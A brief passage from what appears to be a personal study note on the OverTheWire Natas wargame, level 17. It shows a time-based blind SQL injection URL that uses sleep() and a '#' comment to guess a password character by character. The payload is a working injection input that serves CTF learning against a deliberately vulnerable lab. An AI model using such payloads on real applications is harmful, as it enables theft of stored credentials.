viing937/viing937.github.io/overthewire.md

 Have a try, browse to the url below to guess the password.
 If the password starts with x, the result will be returned after a sleep.
-Why can character "#" following input disable the last double quote?

         http://natas17.natas.labs.overthewire.org/?username=natas18" and if(password like binary "x%", sleep(5), null)%23&debug